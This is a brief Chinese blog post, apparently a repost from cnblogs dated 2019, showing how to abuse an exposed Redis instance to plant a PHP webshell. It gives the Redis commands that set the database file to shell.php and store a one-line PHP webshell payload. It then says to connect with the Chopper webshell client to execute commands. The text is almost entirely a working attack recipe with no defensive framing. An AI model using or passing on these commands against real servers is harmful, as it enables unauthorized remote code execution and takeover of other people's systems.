redis一句话木马控电脑
时间:2019-05-15 21:09:37
收藏:0
阅读:379
(1)在redis管理工具内写入木马并保存:
输入命令行:
config set dbfilename shell.php
set shell "<?php @assert($_POST[key]);?>"
save



(2)此时我们再使用菜刀工具进行连接

(3)木马直接就能成功被菜刀连接执行

原文:https://www.cnblogs.com/cute-puli/p/10870215.html
评论(0)